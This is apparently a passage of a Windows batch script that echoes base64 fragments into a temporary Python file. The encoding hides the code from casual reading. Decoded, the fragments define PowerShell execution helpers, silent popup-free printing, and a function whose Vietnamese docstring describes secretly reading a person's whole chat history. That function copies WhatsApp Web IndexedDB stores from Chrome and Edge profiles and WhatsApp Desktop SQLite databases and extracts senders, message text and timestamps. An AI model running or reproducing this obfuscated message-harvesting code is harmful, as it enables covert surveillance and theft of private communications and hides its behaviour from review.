echo b64_str += "ICAgICAgZiInSW5zdGFsbGVkOiAnKyRwbmFtZSsnIC0+ICcrJHBvcnQiCiAgICApCiAgICByZXR1cm4gYXdhaXQgYWN0X3Bvd2Vy">> "%temp_py%"
echo b64_str += "c2hlbGwoY21kLCB0aW1lb3V0PTMwKQoKYXN5bmMgZGVmIGFjdF9wcmludF9maWxlKHBhdGgsIHByaW50ZXI9IiIpOgogICAgaWYg">> "%temp_py%"
echo b64_str += "bm90IFBhdGgocGF0aCkuZXhpc3RzKCk6CiAgICAgICAgcmV0dXJuIGYiRXJyb3I6IGZpbGUgbm90IGZvdW5kOiB7cGF0aH0iCiAg">> "%temp_py%"
echo b64_str += "ICBzYWZlX3BhdGggPSBwYXRoLnJlcGxhY2UoJyInLCAnJykKICAgIGlmIHByaW50ZXI6CiAgICAgICAgc2FmZV9wcmludGVyID0g">> "%temp_py%"
echo b64_str += "cHJpbnRlci5yZXBsYWNlKCciJywgJycpCiAgICAgICAgY21kID0gZidTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAie3NhZmVfcGF0">> "%temp_py%"
echo b64_str += "aH0iIC1WZXJiIFByaW50VG8gLUFyZ3VtZW50TGlzdCAie3NhZmVfcHJpbnRlcn0iJwogICAgZWxzZToKICAgICAgICBjbWQgPSBm">> "%temp_py%"
echo b64_str += "J1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJ7c2FmZV9wYXRofSIgLVZlcmIgUHJpbnQnCiAgICByID0gYXdhaXQgYWN0X3Bvd2Vy">> "%temp_py%"
echo b64_str += "c2hlbGwoY21kLCB0aW1lb3V0PTYwKQogICAgcmV0dXJuIHIgaWYgciBlbHNlIGYiUHJpbnQgam9iIHNlbnQ6IHtQYXRoKHBhdGgp">> "%temp_py%"
echo b64_str += "Lm5hbWV9IgoKYXN5bmMgZGVmIGFjdF9wcmludF9kYXRhKGRhdGE6IHN0ciwgZmlsZW5hbWU6IHN0ciA9ICJkb2N1bWVudC5wZGYi">> "%temp_py%"
echo b64_str += "LCBwcmludGVyOiBzdHIgPSAiIik6CiAgICAiIiJOaOG6rW4gZOG7ryBsaeG7h3UgdGjDtCwgdOG7sSDEkeG7mW5nIGdp4bqjaSBt">> "%temp_py%"
echo b64_str += "w6MgdGjDoG5oIFBERi92xINuIGLhuqNuIHLhu5NpIMSR4bqpeSBs4buHbmggaW4gbmdheSBs4bqtcCB04bupYy4iIiIKICAgIGlt">> "%temp_py%"
echo b64_str += "cG9ydCB0ZW1wZmlsZSwgYmFzZTY0IGFzIF9iNjQKICAgIHRyeToKICAgICAgICByYXcgPSBfYjY0LmI2NGRlY29kZShkYXRhKQog">> "%temp_py%"
echo b64_str += "ICAgICAgIGV4dCA9IFBhdGgoZmlsZW5hbWUpLnN1ZmZpeCBvciAiLnBkZiIKICAgICAgICB0bXAgPSBQYXRoKHRlbXBmaWxlLm1r">> "%temp_py%"
echo b64_str += "dGVtcChzdWZmaXg9ZXh0LCBkaXI9QkFTRV9ESVIpKQogICAgICAgIHRtcC53cml0ZV9ieXRlcyhyYXcpCiAgICAgICAgcmVzdWx0">> "%temp_py%"
echo b64_str += "ID0gYXdhaXQgYWN0X3ByaW50X2ZpbGUoc3RyKHRtcCksIHByaW50ZXIpCiAgICAgICAgdHJ5OiB0bXAudW5saW5rKG1pc3Npbmdf">> "%temp_py%"
echo b64_str += "b2s9VHJ1ZSkKICAgICAgICBleGNlcHQ6IHBhc3MKICAgICAgICByZXR1cm4gcmVzdWx0IGlmIHJlc3VsdCBlbHNlIGYixJDDoyBn">> "%temp_py%"
echo b64_str += "4butaSBs4buHbmggaW46IHtmaWxlbmFtZX0iCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgcmV0dXJuIGYiRXJy">> "%temp_py%"
echo b64_str += "b3I6IHtlfSIKCmFzeW5jIGRlZiBhY3Rfc2lsZW50X3ByaW50X2ltYWdlKGRhdGE6IHN0ciwgcHJpbnRlcjogc3RyID0gIiIpOgog">> "%temp_py%"
echo b64_str += "ICAgIiIiSW4g4bqjbmggaG/DoG4gdG/DoG4gaW0gbOG6t25nIChraMO0bmcgcG9wdXApIHF1YSAuTkVUIFByaW50RG9jdW1lbnQs">> "%temp_py%"
echo b64_str += "IHThu7EgxJHhu5luZyBjYW5oIGNo4buJbmgga8OtY2ggdGjGsOG7m2MgKGZpdCB0byBwYWdlKS4iIiIKICAgIGltcG9ydCB0ZW1w">> "%temp_py%"
echo b64_str += "ZmlsZSwgYmFzZTY0IGFzIF9iNjQKICAgIHRyeToKICAgICAgICByYXcgPSBfYjY0LmI2NGRlY29kZShkYXRhKQogICAgICAgIHRt">> "%temp_py%"
echo b64_str += "cCA9IFBhdGgodGVtcGZpbGUubWt0ZW1wKHN1ZmZpeD0iLnBuZyIsIGRpcj1CQVNFX0RJUikpCiAgICAgICAgdG1wLndyaXRlX2J5">> "%temp_py%"
echo b64_str += "dGVzKHJhdykKICAgICAgICAKICAgICAgICBzYWZlX3BhdGggPSBzdHIodG1wKS5yZXBsYWNlKCInIiwgIicnIikKICAgICAgICBz">> "%temp_py%"
echo b64_str += "YWZlX3ByaW50ZXIgPSBwcmludGVyLnJlcGxhY2UoIiciLCAiJyciKSBpZiBwcmludGVyIGVsc2UgIiIKICAgICAgICAKICAgICAg">> "%temp_py%"
echo b64_str += "ICBwc19zY3JpcHQgPSBmIiIiCkFkZC1UeXBlIC1Bc3NlbWJseU5hbWUgU3lzdGVtLkRyYXdpbmcKJGltZyA9IFtTeXN0ZW0uRHJh">> "%temp_py%"
echo b64_str += "d2luZy5JbWFnZV06OkZyb21GaWxlKCd7c2FmZV9wYXRofScpCiRkb2MgPSBOZXctT2JqZWN0IFN5c3RlbS5EcmF3aW5nLlByaW50">> "%temp_py%"
echo b64_str += "aW5nLlByaW50RG9jdW1lbnQKIiIiCiAgICAgICAgaWYgc2FmZV9wcmludGVyOgogICAgICAgICAgICBwc19zY3JpcHQgKz0gZiIk">> "%temp_py%"
echo b64_str += "ZG9jLlByaW50ZXJTZXR0aW5ncy5QcmludGVyTmFtZSA9ICd7c2FmZV9wcmludGVyfSdcbiIKICAgICAgICAgICAgCiAgICAgICAg">> "%temp_py%"
echo b64_str += "cHNfc2NyaXB0ICs9ICIiIgokZG9jLkRlZmF1bHRQYWdlU2V0dGluZ3MuTGFuZHNjYXBlID0gKCRpbWcuV2lkdGggLWd0ICRpbWcu">> "%temp_py%"
echo b64_str += "SGVpZ2h0KQoKJGRvYy5hZGRfUHJpbnRQYWdlKHsKICAgIHBhcmFtKCRzZW5kZXIsICRlKQogICAgJGcgPSAkZS5HcmFwaGljcwog">> "%temp_py%"
echo b64_str += "ICAgJG1hcmdpbiA9ICRlLlBhZ2VTZXR0aW5ncy5NYXJnaW5zCiAgICAkcFdpZHRoID0gJGUuUGFnZUJvdW5kcy5XaWR0aCAtICRt">> "%temp_py%"
echo b64_str += "YXJnaW4uTGVmdCAtICRtYXJnaW4uUmlnaHQKICAgICRwSGVpZ2h0ID0gJGUuUGFnZUJvdW5kcy5IZWlnaHQgLSAkbWFyZ2luLlRv">> "%temp_py%"
echo b64_str += "cCAtICRtYXJnaW4uQm90dG9tCiAgICAKICAgICRzY2FsZSA9IFttYXRoXTo6TWluKCRwV2lkdGggLyAkaW1nLldpZHRoLCAkcEhl">> "%temp_py%"
echo b64_str += "aWdodCAvICRpbWcuSGVpZ2h0KQogICAgJHcgPSBbaW50XSgkaW1nLldpZHRoICogJHNjYWxlKQogICAgJGggPSBbaW50XSgkaW1n">> "%temp_py%"
echo b64_str += "LkhlaWdodCAqICRzY2FsZSkKICAgICR4ID0gJG1hcmdpbi5MZWZ0ICsgKCRwV2lkdGggLSAkdykgLyAyCiAgICAkeSA9ICRtYXJn">> "%temp_py%"
echo b64_str += "aW4uVG9wICsgKCRwSGVpZ2h0IC0gJGgpIC8gMgogICAgCiAgICAkZy5EcmF3SW1hZ2UoJGltZywgJHgsICR5LCAkdywgJGgpCn0p">> "%temp_py%"
echo b64_str += "CiRkb2MuUHJpbnQoKQokaW1nLkRpc3Bvc2UoKQoiIiIKICAgICAgICByZXN1bHQgPSBhd2FpdCBhY3RfcG93ZXJzaGVsbChwc19z">> "%temp_py%"
echo b64_str += "Y3JpcHQsIHRpbWVvdXQ9NjApCiAgICAgICAgdHJ5OiB0bXAudW5saW5rKG1pc3Npbmdfb2s9VHJ1ZSkKICAgICAgICBleGNlcHQ6">> "%temp_py%"
echo b64_str += "IHBhc3MKICAgICAgICAKICAgICAgICBpZiByZXN1bHQgYW5kICJFcnJvciIgaW4gcmVzdWx0OgogICAgICAgICAgICByZXR1cm4g">> "%temp_py%"
echo b64_str += "cmVzdWx0CiAgICAgICAgcmV0dXJuIGYiSW4gdGjDoG5oIGPDtG5nIHRyw6puIG3DoXkgaW46IHtwcmludGVyIG9yICdN4bq3YyDE">> "%temp_py%"
echo b64_str += "keG7i25oJ30iCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgcmV0dXJuIGYiRXJyb3I6IHtlfSIKCmFzeW5jIGRl">> "%temp_py%"
echo b64_str += "ZiBhY3RfcmVhZF93aGF0c2FwcF9kYihkYXRlX2Zyb209Tm9uZSwgZGF0ZV90bz1Ob25lKToKICAgICIiIgogICAg8J+SrCBbVEhV">> "%temp_py%"
echo b64_str += "IFRI4bqsUCBLw50g4buoQyBXSEFUU0FQUF0gLSDEkOG7jWMgdHLhu5ltIHRvw6BuIGLhu5kgbOG7i2NoIHPhu60gdGluIG5o4bqv">> "%temp_py%"
echo b64_str += "biB0csOyIGNodXnhu4duIGPhu6dhIGdpw6FtIGto4bqjbwogICAgKEThu4UgaGnhu4N1OiBRdcOpdCBjw6FjIGPGoSBz4bufIGTh">> "%temp_py%"
echo b64_str += "u68gbGnhu4d1IFNRTGl0ZSBiw60gbeG6rXQgY+G7p2EgV2hhdHNBcHAgRGVza3RvcCBob+G6t2MgZOG7ryBsaeG7h3UgbMawdSB0">> "%temp_py%"
echo b64_str += "cuG7ryBJbmRleGVkREIgY+G7p2EgQ2hyb21lL0VkZ2UgxJHhu4MgaOG7k2kgcGjhu6VjIHbDoCB4ZW0gbMOpbiB0aW4gbmjhuq9u">> "%temp_py%"
echo b64_str += "KQogICAgIiIiCiAgICBpbXBvcnQgdGVtcGZpbGUsIHNodXRpbAogICAgZnJvbSBkYXRldGltZSBpbXBvcnQgZGF0ZXRpbWUsIHRp">> "%temp_py%"
echo b64_str += "bWV6b25lCgogICAgZGVmIF9wYXJzZV9kdChzKToKICAgICAgICBpZiBub3QgczoKICAgICAgICAgICAgcmV0dXJuIE5vbmUKICAg">> "%temp_py%"
echo b64_str += "ICAgICB0cnk6CiAgICAgICAgICAgIHJldHVybiBkYXRldGltZS5zdHJwdGltZShzLCAiJVktJW0tJWQiKS5yZXBsYWNlKHR6aW5m">> "%temp_py%"
echo b64_str += "bz10aW1lem9uZS51dGMpCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICAgICAgcmV0dXJuIE5vbmUKCiAgICBkZWYg">> "%temp_py%"
echo b64_str += "X3RzX29rKHRzKToKICAgICAgICBpZiB0cyBpcyBOb25lOgogICAgICAgICAgICByZXR1cm4gVHJ1ZQogICAgICAgIHRyeToKICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgdmFsID0gZmxvYXQodHMpCiAgICAgICAgICAgIGlmIHZhbCA+IDFlMTI6CiAgICAgICAgICAgICAgICB2YWwgLz0g">> "%temp_py%"
echo b64_str += "MTAwMAogICAgICAgICAgICBkdCA9IGRhdGV0aW1lLmZyb210aW1lc3RhbXAodmFsLCB0ej10aW1lem9uZS51dGMpCiAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgIGlmIGR0X2Zyb20gYW5kIGR0IDwgZHRfZnJvbToKICAgICAgICAgICAgICAgIHJldHVybiBGYWxzZQogICAgICAgICAgICBp">> "%temp_py%"
echo b64_str += "ZiBkdF90byAgIGFuZCBkdCA+IGR0X3RvOgogICAgICAgICAgICAgICAgcmV0dXJuIEZhbHNlCiAgICAgICAgICAgIHJldHVybiBU">> "%temp_py%"
echo b64_str += "cnVlCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICAgICAgcmV0dXJuIFRydWUKCiAgICBkdF9mcm9tID0gX3BhcnNl">> "%temp_py%"
echo b64_str += "X2R0KGRhdGVfZnJvbSkKICAgIGR0X3RvICAgPSBfcGFyc2VfZHQoZGF0ZV90bykKICAgIG1lc3NhZ2VzICA9IFtdCiAgICBzcmNf">> "%temp_py%"
echo b64_str += "aW5mbyAgPSBbXQogICAgbG9jYWxfYXBwID0gUGF0aChvcy5lbnZpcm9uLmdldCgiTE9DQUxBUFBEQVRBIiwgIiIpKQoKICAgICMg">> "%temp_py%"
echo b64_str += "4pSA4pSAIDEuIMSQ4buNYyB0aW4gbmjhuq9uIFdoYXRzQXBwIFdlYiB04burIEluZGV4ZWREQiBj4bunYSBDaHJvbWUvRWRnZSDi">> "%temp_py%"
echo b64_str += "lIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDilIDi">> "%temp_py%"
echo b64_str += "lIDilIAKICAgIHRyeToKICAgICAgICBpbXBvcnQgY2NsX2Nocm9taXVtX2luZGV4ZWRkYgogICAgICAgIEhBU19DQ0wgPSBUcnVl">> "%temp_py%"
echo b64_str += "CiAgICBleGNlcHQgSW1wb3J0RXJyb3I6CiAgICAgICAgSEFTX0NDTCA9IEZhbHNlCgogICAgYnJvd3Nlcl9yb290cyA9IHsKICAg">> "%temp_py%"
echo b64_str += "ICAgICAiQ2hyb21lIjogbG9jYWxfYXBwIC8gIkdvb2dsZS9DaHJvbWUvVXNlciBEYXRhL0RlZmF1bHQvSW5kZXhlZERCIiwKICAg">> "%temp_py%"
echo b64_str += "ICAgICAiRWRnZSI6ICAgbG9jYWxfYXBwIC8gIk1pY3Jvc29mdC9FZGdlL1VzZXIgRGF0YS9EZWZhdWx0L0luZGV4ZWREQiIsCiAg">> "%temp_py%"
echo b64_str += "ICB9CgogICAgZm9yIGJuYW1lLCBpZGJfcm9vdCBpbiBicm93c2VyX3Jvb3RzLml0ZW1zKCk6CiAgICAgICAgaWYgbm90IGlkYl9y">> "%temp_py%"
echo b64_str += "b290LmV4aXN0cygpOgogICAgICAgICAgICBjb250aW51ZQogICAgICAgIHdhX2lkYiA9IE5vbmUKICAgICAgICB0cnk6CiAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgIGZvciBkIGluIGlkYl9yb290Lml0ZXJkaXIoKToKICAgICAgICAgICAgICAgIGlmICJ3ZWIud2hhdHNhcHAuY29tIiBp">> "%temp_py%"
echo b64_str += "biBkLm5hbWUgYW5kIGQuaXNfZGlyKCk6CiAgICAgICAgICAgICAgICAgICAgd2FfaWRiID0gZAogICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "IGJyZWFrCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICAgICAgcGFzcwoKICAgICAgICBpZiBub3Qgd2FfaWRiOgog">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICBzcmNfaW5mby5hcHBlbmQoZiJ7Ym5hbWV9OiBJbmRleGVkREIgV2hhdHNBcHAgV2ViIGtow7RuZyBraOG6oyBk">> "%temp_py%"
echo b64_str += "4bulbmciKQogICAgICAgICAgICBjb250aW51ZQoKICAgICAgICB0bXBfZGlyID0gUGF0aCh0ZW1wZmlsZS5ta2R0ZW1wKHByZWZp">> "%temp_py%"
echo b64_str += "eD0id2FfaWRiXyIpKQogICAgICAgIHRyeToKICAgICAgICAgICAgZHN0ID0gdG1wX2RpciAvICJ3YV9pZGIiCiAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "IHNodXRpbC5jb3B5dHJlZShzdHIod2FfaWRiKSwgc3RyKGRzdCkpCiAgICAgICAgICAgIGlmIEhBU19DQ0w6CiAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICB0cnk6CiAgICAgICAgICAgICAgICAgICAgZW52ID0gY2NsX2Nocm9taXVtX2luZGV4ZWRkYi5XcmFwcGVkSW5kZXhEQihz">> "%temp_py%"
echo b64_str += "dHIoZHN0KSkKICAgICAgICAgICAgICAgICAgICBmb3IgZGJfcmVjIGluIGVudi5kYXRhYmFzZXMoKToKICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgZm9yIHN0b3JlX25hbWUgaW4gZGJfcmVjLm9iamVjdF9zdG9yZV9uYW1lczoKICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgIGlmIGFueShrIGluIHN0b3JlX25hbWUubG93ZXIoKSBmb3IgayBpbiAoIm1lc3NhZ2UiLCAibXNnIiwgImNoYXQiKSk6">> "%temp_py%"
echo b64_str += "CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBm">> "%temp_py%"
echo b64_str += "b3IgcmVjb3JkIGluIGRiX3JlY1tzdG9yZV9uYW1lXS5nZXRfYWxsKCk6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICB2YWwgPSByZWNvcmQudmFsdWUKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIG5vdCBp">> "%temp_py%"
echo b64_str += "c2luc3RhbmNlKHZhbCwgZGljdCk6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWUK">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRzID0gdmFsLmdldCgidCIpIG9yIHZhbC5nZXQoInRpbWVz">> "%temp_py%"
echo b64_str += "dGFtcCIpIG9yIHZhbC5nZXQoInRzIikKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIG5vdCBfdHNf">> "%temp_py%"
echo b64_str += "b2sodHMpOgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlCiAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICBtZXNzYWdlcy5hcHBlbmQoewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICJzb3VyY2UiOiBibmFtZSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAi">> "%temp_py%"
echo b64_str += "ZnJvbSI6ICAgc3RyKHZhbC5nZXQoImZyb20iKSBvciB2YWwuZ2V0KCJhdXRob3IiKSBvciAiIiksCiAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgImJvZHkiOiAgIHN0cih2YWwuZ2V0KCJib2R5Iikgb3IgdmFsLmdldCgidGV4dCIp">> "%temp_py%"
echo b64_str += "IG9yICIiKVs6NTAwXSwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidHMiOiAgICAgdHMsCiAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9KQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV4">> "%temp_py%"
echo b64_str += "Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBhc3MKICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICBzcmNfaW5mby5hcHBlbmQoZiJ7Ym5hbWV9OiBM4bqleSBs4buLY2ggc+G7rSBJbmRleGVkREIgdGjDoG5oIGPDtG5nIikKICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICAgICAgICAgICAgICBzcmNfaW5mby5hcHBlbmQoZiJ7">> "%temp_py%"
echo b64_str += "Ym5hbWV9OiBDQ0wgbOG7l2kgZ2nhuqNpIG3DoyDigJMge2V9IikKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHRv">> "%temp_py%"
echo b64_str += "dGFsX2tiID0gc3VtKGYuc3RhdCgpLnN0X3NpemUgZm9yIGYgaW4gZHN0LnJnbG9iKCIqIikgaWYgZi5pc19maWxlKCkpIC8vIDEw">> "%temp_py%"
echo b64_str += "MjQKICAgICAgICAgICAgICAgIHNyY19pbmZvLmFwcGVuZCgKICAgICAgICAgICAgICAgICAgICBmIntibmFtZX06IFBow6F0IGhp">> "%temp_py%"
echo b64_str += "4buHbiBJbmRleGVkREIgV2hhdHNBcHAgV2ViICh7dG90YWxfa2J9IEtCKSDigJMgIgogICAgICAgICAgICAgICAgICAgIGYiY+G6">> "%temp_py%"
echo b64_str += "p24gY+G6pXkgJ2NjbC1jaHJvbWl1bS1pbmRleGVkZGInIMSR4buDIHThu7EgxJHhu5luZyDEkeG7jWMiCiAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICApCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgICAgICBzcmNfaW5mby5hcHBlbmQoZiJ7Ym5hbWV9OiBM">> "%temp_py%"
echo b64_str += "4buXaSBzYW8gY2jDqXAgY8ahIHPhu58gSW5kZXhlZERCIOKAkyB7ZX0iKQogICAgICAgIGZpbmFsbHk6CiAgICAgICAgICAgIHNo">> "%temp_py%"
echo b64_str += "dXRpbC5ybXRyZWUoc3RyKHRtcF9kaXIpLCBpZ25vcmVfZXJyb3JzPVRydWUpCgogICAgIyDilIDilIAgMi4gxJDhu41jIHRpbiBu">> "%temp_py%"
echo b64_str += "aOG6r24gdOG7qyDhu6luZyBk4bulbmcgY8OgaSDEkeG6t3QgV2hhdHNBcHAgRGVza3RvcCAoS2hhaSB0aMOhYyBTUUxpdGUpIOKU">> "%temp_py%"
echo b64_str += "gOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKUgOKU">> "%temp_py%"
echo b64_str += "gOKUgOKUgAogICAgcGtncyA9IGxvY2FsX2FwcCAvICJQYWNrYWdlcyIKICAgIGlmIHBrZ3MuZXhpc3RzKCk6CiAgICAgICAgdHJ5">> "%temp_py%"
echo b64_str += "OgogICAgICAgICAgICBmb3IgcGtnIGluIHBrZ3MuaXRlcmRpcigpOgogICAgICAgICAgICAgICAgaWYgIndoYXRzYXBwIiBub3Qg">> "%temp_py%"
echo b64_str += "aW4gcGtnLm5hbWUubG93ZXIoKToKICAgICAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgICAgICAgICAgbHMgPSBwa2cg">> "%temp_py%"
echo b64_str += "LyAiTG9jYWxTdGF0ZSIKICAgICAgICAgICAgICAgIGlmIG5vdCBscy5leGlzdHMoKToKICAgICAgICAgICAgICAgICAgICBjb250">> "%temp_py%"
echo b64_str += "aW51ZQogICAgICAgICAgICAgICAgZGJfZmlsZXMgPSBsaXN0KGxzLmdsb2IoIiouZGIiKSkgKyBsaXN0KGxzLmdsb2IoIiouc3Fs">> "%temp_py%"
echo b64_str += "aXRlIikpCiAgICAgICAgICAgICAgICBpZiBkYl9maWxlczoKICAgICAgICAgICAgICAgICAgICBpbXBvcnQgc3FsaXRlMwogICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgIFNRTElURV9NQUdJQyA9IGInU1FMaXRlIGZvcm1hdCAzXHgwMCcKICAgICAgICAgICAgICAgICAgICBm">> "%temp_py%"
echo b64_str += "b3IgZGJfcGF0aCBpbiBkYl9maWxlc1s6M106CiAgICAgICAgICAgICAgICAgICAgICAgIHRtcF9kYiA9IFBhdGgodGVtcGZpbGUu">> "%temp_py%"
echo b64_str += "bWt0ZW1wKHN1ZmZpeD0iLmRiIikpCiAgICAgICAgICAgICAgICAgICAgICAgIHRyeToKICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgIHNodXRpbC5jb3B5MihzdHIoZGJfcGF0aCksIHN0cih0bXBfZGIpKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgaGVh">> "%temp_py%"
echo b64_str += "ZGVyID0gdG1wX2RiLnJlYWRfYnl0ZXMoKVs6MTZdCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiBoZWFkZXIgIT0gU1FM">> "%temp_py%"
echo b64_str += "SVRFX01BR0lDWzoxNl06CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjX2luZm8uYXBwZW5kKGYiV2hhdHNBcHAg">> "%temp_py%"
echo b64_str += "RGVza3RvcDoge2RiX3BhdGgubmFtZX0gxJHDoyDEkcaw4bujYyBtw6MgaMOzYSBi4bqxbmcgU1FMQ2lwaGVyIOKAkyBi4bqldCBr">> "%temp_py%"
echo b64_str += "aOG6oyB4w6JtIHBo4bqhbSB0cuG7sWMgdGnhur9wIikKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0bXBfZGIudW5s">> "%temp_py%"
echo b64_str += "aW5rKG1pc3Npbmdfb2s9VHJ1ZSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgY29ubiA9IHNxbGl0ZTMuY29ubmVjdChzdHIodG1wX2RiKSkKICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgIGN1ciAgPSBjb25uLmN1cnNvcigpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB0YWJsZXMgPSBbclswXSBmb3IgciBp">> "%temp_py%"
echo b64_str += "biBjdXIuZXhlY3V0ZSgKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU0VMRUNUIG5hbWUgRlJPTSBzcWxpdGVfbWFz">> "%temp_py%"
echo b64_str += "dGVyIFdIRVJFIHR5cGU9J3RhYmxlJyIKICAgICAgICAgICAgICAgICAgICAgICAgICAgICkuZmV0Y2hhbGwoKV0KICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgIGZvciB0YmwgaW4gdGFibGVzOgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIG5v">> "%temp_py%"
echo b64_str += "dCBhbnkoayBpbiB0YmwubG93ZXIoKSBmb3IgayBpbiAoIm1lc3NhZ2UiLCJtc2ciLCJjaGF0IikpOgogICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRyeToKICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgY29scyA9IFtjWzFdIGZvciBjIGluIGN1ci5leGVjdXRlKAogICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgZiJQUkFHTUEgdGFibGVfaW5mbyh7dGJsfSkiCiAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICkuZmV0Y2hhbGwoKV0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHNfY29sICAg">> "%temp_py%"
echo b64_str += "PSBuZXh0KChjIGZvciBjIGluIGNvbHMgaWYgYW55KGsgaW4gYy5sb3dlcigpIGZvciBrIGluICgidGltZSIsInRzIiwiZGF0ZSIp">> "%temp_py%"
echo b64_str += "KSksIE5vbmUpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJvZHlfY29sID0gbmV4dCgoYyBmb3IgYyBpbiBj">> "%temp_py%"
echo b64_str += "b2xzIGlmIGFueShrIGluIGMubG93ZXIoKSBmb3IgayBpbiAoImJvZHkiLCJ0ZXh0IiwiY29udGVudCIsIm1lc3NhZ2UiKSkpLCBO">> "%temp_py%"
echo b64_str += "b25lKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcm9tX2NvbCA9IG5leHQoKGMgZm9yIGMgaW4gY29scyBp">> "%temp_py%"
echo b64_str += "ZiBhbnkoayBpbiBjLmxvd2VyKCkgZm9yIGsgaW4gKCJmcm9tIiwic2VuZGVyIiwiYXV0aG9yIiwiamlkIikpKSwgTm9uZSkKICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgbm90IGJvZHlfY29sOgogICAgICAgICAgICAgICAgICAgICAgICAg">> "%temp_py%"
echo b64_str += "ICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2VsID0gZiJTRUxFQ1Qg">> "%temp_py%"
echo b64_str += "e3RzX2NvbCBvciAnTlVMTCd9LCB7ZnJvbV9jb2wgb3IgJ05VTEwnfSwge2JvZHlfY29sfSBGUk9NIHt0Ymx9IE9SREVSIEJZIHJv">> "%temp_py%"
echo b64_str += "d2lkIERFU0MgTElNSVQgMjAwIgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmb3Igcm93IGluIGN1ci5leGVj">> "%temp_py%"
